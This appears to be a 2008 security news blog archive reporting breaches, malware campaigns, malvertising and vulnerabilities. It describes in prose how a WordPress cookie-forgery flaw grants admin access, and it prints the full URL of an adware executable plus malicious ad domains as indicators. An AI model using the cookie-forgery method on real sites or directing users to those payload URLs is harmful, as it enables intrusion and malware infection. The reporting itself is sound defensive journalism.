CyberInsecure.com

Archive for April, 2008

On April 11th hackers breached the computer system used by University of Massachusetts Amherst’s Health Services, potentially gaining access to thousands of medical records. After an initial investigation of the remote intrusion, the University decided to shut down the network. Though many of the most personal medical records are kept on paper files, officials say some personal information is available on the 150 computers used by the department.

More than half of the student population at UMass Amherst are patients on record at the University Health Services. According to the UMass Amherst web site, the school had an enrollment of 25,593 total undergraduate and graduate students in the fall of 2006. The supposed breach might affect these people.

A fact that’s even more unsettling for patients who were unaware of the breach more than a week after it occurred. The University did post a notice on the Health Services website, and they are notifying patients when they enter the clinic.

The University has launched a detailed evaluation of the incident to find out if any of the files were accessed during the intrusion, and will keep the community advised of its findings. Campus officials say it will be weeks before they are completely sure what information, if any, was taken off the computers. Officials believe outside hackers wanted to use the server as a host for illegal music and video downloads, one that would make the culprits untraceable.

The workstations in question contained limited patient information. To date, about 30 workstations have been returned to service and officials project that the entire network will be operating within the next week. According to campus officials, the entire campus system is being looked at to avoid future breaches.

According to a Justice Department press release, a Nigerian man was sentenced to 18 months in prison after tricking a NASA employee into clicking on an email attachment that installed malware on her government-issued computer. The unnamed Washington-based employee received the email from an individual she had met on an online dating site.  As a result, her computer passwords, bank account numbers, social security number, driver’s license information and address were all disclosed.

NASA’s Office of Inspector General (OIG) began investigating the breach in December 2006 and quickly traced the attacker to Nigeria. A joint investigative team comprising Nigeria’s Economic and Financial Crime Commission (EFCC), US Attorneys in Washington and New York and the OIG’s computer crimes division convened an undercover operation that eventually led to 27-year-old Akeem Adejumo, who according to a court document also went by the name of Stephen Williams. Adejumo pleaded guilty to two counts of obtaining goods by false pretenses and forgery and was sentenced to 18 months in prison by the Lagos State High Court in Nigeria.

It’s important to note that this breach never would have happened without the cooperation of one very gullible (and likely delinquent) NASA employee. There’s no word whether she has been fired or disciplined, or whether NASA has taken steps to prevent similar episodes from happening again.

WordPress is prone to a vulnerability that allows an attacker to gain unauthorized access. An attacker, who is able to register a specially crafted username on a Wordpress installation, is able to generate authentication cookies for other chosen accounts, including admin account. If a Wordpress blog is configured to freely permit account creation, a remote attacker can gain Wordpress-administrator access and then elevate this to arbitrary code execution as the web server user.

An attacker wishing to exploit this vulnerability would create an unprivileged account with its username starting with “admin”. The cookie returned on logging into this account can then be manipulated so as to be valid for the administrator account.

Successfully exploiting this issue will compromise the affected application. Attackers can use a browser to exploit this issue.

Versions prior to WordPress 2.5.1 are vulnerable.

Solutions:

1.Upgrade to Wordpress 2.5.1

2. De-select “Anyone can register” in the Membership section of “General Settings” to disable new accounts creation.

Microsoft has reportedly developed a USB key that allows investigators to extract forensic data from PCs. The tools called “COFEE” (Computer Online Forensic Evidence Extractor) comes in a USB key form factor, and was distributed to a small number of law-enforcement agencies last June. The device includes 150 tools that allow investigators to extract internet history files and “decrypt passwords”. COFEE also allows investigators to upload data for analysis.

The device is used by more than 2,000 officers in at least 15 countries, including Germany and the US. Microsoft supplies the technology to law enforcement agencies without charge. The tool reportedly allows investigators to scan for evidence on site without necessarily having to cart PCs back to a lab.

Computer forensics is a painstaking process carefully designed to make sure data on a suspect computer isn’t changed - simply plugging a device into a computer to extract data seems like a quick and dirty fix. The admissibility of such data in court in debatable even before we get into considering the possibility that the USB key might contain malware.

The extraction and analysis of digital evidence features in the investigation of more on more crimes, not just those specific to computers such as internet fraud and child abuse investigations. UK specialists said they’re struggling to cope with the volume of work from law enforcement clients. There’s a genuine problem here, but we’re not convinced COFEE is the solution.

Ironically, COFEE can not help investigators when Windows Vista is installed on suspect`s PC. COFEE can not decrypt files that were encrypted using BitLocker technology.

The University of Colorado at Boulder announced Friday that three computers in the Division of Continuing Education and Professional Studies were compromised, leaving nearly 10,000 people open to potential identity theft. Officials say students and instructors who were involved in the Division of Continuing Education and Professional Studies between 1997 and 2003 were affected.

On Thursday, CU Boulder IT security investigators discovered a malicious file on the computers and began analyzing log files to determine the extent of the exposure and whether any information was accessed. Investigators are still trying to determine the intent of the malicious file and whether it allowed the perpetrator to gain access to any private data.

Bronson Hilliard, a spokesman for CU-Boulder, says one of the three computers had personal data, including names, Social Security numbers, addresses and grades, of about 9,000 students and about 500 instructors.

The university is deeply troubled that this compromise occurred despite efforts under way across campus to address computer security. They do not believe the data has been accessed, but CU is in the process of contacting the affected students and instructors by mail. CU says a computer forensics firm has been hired to conduct an analysis.

Russ McRee, a security consultant for HolisticInfoSec, documented cross-site scripting (XSS) errors in 5 sites that prominently carry a valid logo declaring them to be Hacker Safe. As McRee documented in a blog post and accompanying video, the bugs make it possible for attackers to steal authentication credentials and redirect visitors to malicious websites. It happens more than three months after security bugs were documented in more than 60 e-commerce sites certified by McAfee as “Hacker Safe”.

All five of the sites subscribe to McAfee’s HackerSafe certification service, which audits the security of websites on a daily basis to give visitors confidence they’ll be safe when doing business there. Yet McRee was able to find the bugs by using advanced Google searches to pinpoint vulnerable web applications, and in at least one case, the XSS vulnerability has been on the customer’s site since January.

The five vulnerable sites include Alsto.com, Delexpress.hudsonltd.net, BlueFly.com, ImprovementsCatalog.com and DelightfulDeliveries.com. These are only the latest Hacker Safe sites to be outed. In January, researchers from XSSed.com, documented 62 websites subscribing to the service that were vulnerable to XSS vulnerabilities. A Hacker Safe spokesman said at the time the bugs couldn’t be used to hack a server.

The vulnerabilities also raise the question of so-called payment card industry (PCI) requirements for businesses that process credit card payments. Websites that contain XSS vulnerabilities almost certainly don’t comply and yet most of the sites continue to accept credit cards.

McAfee has had three months to fix the deficiencies of this program, but so far we see no evidence it’s done so. No comments regarding recent Russ McRee discovery were made by McAfee representatives.

Consumer-focused spam filtering firm ClearMyMail claims that more than half of the junk mail being blocked by its service on Tuesday is Grand Theft Auto IV-related. The vast majority of the junk mail messages offer the opportunity to win a PlS3 complete with the game.

Gamers desperate to get their mitts on Grand Theft Auto IV are being targeted in an opportunistic spyware scam. Spam emails offer prospective marks free entry to a draw offering a PlayStation 3 loaded with the much-anticipated game as a prize. In reality, these illicit emails are loaded with spyware designed to swipe personal financial information from compromised PCs.

Grand Theft Auto IV for the PS3 and the Xbox 360 was released today to delirium from avid gamers. But some potential buyers have been left disappointed as game stores have been unable to fulfill demand to the extent that even a minority of fans who pre-ordered the game have been left empty-handed. Spammers are seeking to exploit this disappointment with a carefully targeted spam scam.

“We are seeing unprecedented levels of spam in relation to the game; with more than half of the spam our service is blocking relating to Grand Theft Auto, most of which contain viruses and spyware,” said Dan Field, Managing Director of ClearMyMail. Field advised keen gamers to wait until they can legitimately purchase the game rather than fall victim to “opportunists” capitalizing on pent-up demand.

A new attack uses ASF files opened in Windows Media Player to launch Internet Explorer which will then prompt you to download a malicious executable file.

The Microsoft ASF file format (and some other formats) allows creation of a script stream. The script stream can use certain, simple, script commands in Windows Media Player. The playing application that supports ASF is responsible for executing the script commands at the proper time.

The malicious ASF file that was analyzed opened Internet Explorer with the URL pointing to www.fastmp3player.com/affiliates/772465/1/?embedded=false. This web site had a further 302 redirect to www.fastmp3player.com/affiliates/772465/1/PLAY_MP3.exe (both links are still working, do not click), which is some adware and is detected by 20 out of 32 AV programs on VirusTotal.

While this attack is not sophisticated at all (and there is no real exploit here, just a “feature”), one thing that is worrying is the fact that this can be used to launch a browser on machines which are not patched, through Windows Media Player. And this also works with the latest Windows Media Player on Vista.

It is possible to disable this “feature” in Windows Media Player by modifying certain registry keys:

Open HKEY_CURRENT_USER\SOFTWARE\Microsoft\MediaPlayer\Preferences

And change values to:

- PlayerScriptCommandsEnabled: 0 (disabled) - disabled as default

- WebScriptCommandsEnabled: 0 (disabled) - default is 1 (enabled)

- URLAndExitCommandsEnabled: 0 (disabled) - default is 1 (enabled)

More information is available at http://support.microsoft.com/kb/320944. The keys might not exist and be very careful when changing anything in the registry.

Due to the recent attacks, the scripts are recommended to be disabled.

Websites run by Radio Free Europe have been under a fierce cyber attack that coincided with coverage over the weekend of a rally organized by opposition to the Belarusian opposition.

The distributed denial of service (DDoS) attack initially targeted only the RFE’s Belarus service, which starting on Saturday was inundated with as many as 50,000 fake pings every second. On Monday, it continued to be affected. At least seven other RFE sites for Kosovo, Azerbaijan, Tatar-Bashkir, Farda, South Slavic, Russia and Tajikistan, were also attacked but have mostly been brought back online.

The primary target was the Belarus service, which on Saturday - the 22nd anniversary of the Chernobyl nuclear disaster - offered live coverage of a rally in which thousands of people protested the plight of uncompensated victims and a government decision to build a new nuclear plant. Other Belarusian websites were also hit, including the Minsk-based nongovernmental organization Charter 97. There is no solid evidence, but the Belarusian government might be behind the attacks.

While a state-sponsored attack isn’t outside the realm of possibility, there was no mention that it might be the grassroots work of Belarusian nationalists. Recent attacks against CNN.com, were the work of Chinese hacktivists who downloaded and installed DDoS applications as a way of registering their displeasure of the news site’s recent coverage of demonstrations against the Olympic torch relay.

Attacks such as these were also waged last year against Estonia and are sometimes referred to as “asymmetric” because a relatively small group of individuals with modest means is able to hobble much a bigger target. It’s not hard to imagine that something similar is afoot in Belarus.

Regardless of who is behind the attacks, the result is same, and that is the protest coverage is being disrupted.

Over the past few days, Yahoo has been exposing visitors to fraudware banner ads and also ads that try to trick them into installing malware. The ads are displayed across numerous web portal sections, including Yahoo Mail, Yahoo Groups and Yahoo Astrology.

Some of the ads pitch women’s deodorant, but behind the scenes, they contact servers that have been used by previous rogue ads targeting high-traffic websites. Typically, the ads produce a pop up that looks strikingly similar to official Windows dialog pop-ups that urge the end user to download software to fix problems. Expedia, Rhapsody, MySpace, Excite, Blick, and CNN.com have all served up similar malicious ads in the past.

Attackers who inject their banners onto reputable sites usually take advantage of the highly decentralized way that online advertisements are sold. It’s not unusual for there to be a succession of affiliates, making it possible for an attacker to pose as an authorized agent of a name-brand product or service. In this case, Yahoo has gotten deceived into running ads that point to adtds2.promoplexer.com, which has been implicated in previous rogue banner attacks. Even if you don’t get redirected, the malvertizement still let’s the bad guys know that it is on display by sending info to adtds2.promoplexer.com/statsa.php?campaign=yahoo and adsraise.com/mbuyers/statistics.html

Among other malicious URL redirections there are:

eur.a1.yimg.com/java.europe.yimg.com/eu/any/yahoonew300×250.swf

ope.yahoo.com/eu/any/yahoonew728×90.swf

track.trackads.net/statsa.php?campaign=yahoo

Other sites that use Yahoo advertising (like Ebay) could potentially expose visitors to the malvertizement and fraudware sites.

So far emails were sent to three different Yahoo PR reps but until now there’s no indication anyone at the company is even aware of the problem.

An extremely efficient and simple way to avoid malware would be using the NoScript extension for Firefox. Even if you’ve whitelisted Yahoo, it will block JavaScript and Adobe Flash being sent from the attacker’s website.

Update: (May 3) After only 5 days, Yahoo have finally removed the infected ads and redirections mentioned above.

The theft of a laptop computer owned by an accounting firm has made nearly 500 employees of Coos County and private organizations concerned about identity theft. County officials worry the data may have contained employees’ names, Social Security numbers and other personal information, which had been used in recent audits performed by Hough, MacAdam & Wartnik LLC of North Bend.

According to a Coos Bay Police press log, at approximately 7:28 a.m. on March 5, officers received a report of a woman flagging down Officer Tony Wetmore, identified as 122 in the log, near Coos Bay City Hall. Crystal Albiar, 30, told Wetmore a laptop computer had been stolen from a vehicle, which, Wetmore said, belonged to Albiar. The victim is listed on the press log as Hough, MacAdam & Wartnik. Albiar is a senior accountant at the firm.

Later that day, a letter from the company was sent to clients stating that a serious data security incident may have involved clients’ personal information.

So far there have been no known reports of identity theft from any of the 482 employees notified. The computer has not been found and, according to a letter from the firm, thieves sometimes hold victims’ information for later use.

The CPA said the computer was password protected, as were certain files. Some of the information contained in the programs require “special knowledge in order to find the personal information inside of the program”.

SwimwearBoutique.com recently reported illegally gained unauthorized access to customers personal information stored in SwimwearBoutique.com (SWB) online account. This unlawful access occurred between March 26, 2008 and March 28, 2008. The information accessed varied and included customers name, address, email address, SWB account password, and credit card account number of approximately 37 residents of New Hampshire, who were SWB customers. These criminals also corrupted data maintained by SWB, rendering certain data unreadable and unusable.

This crime was reported to the Dallas office of the United States Secret Service, which are assisting with the investigation. SWB also worked with its existing Internet security provider, McAfee, to determine how these criminals gained access to this information and immediately implemented measures to counter such unlawful conduct.

Notification letters were sent out on April 23, 2008 and affected customers can call for more information 1-866-SWIMWEAR.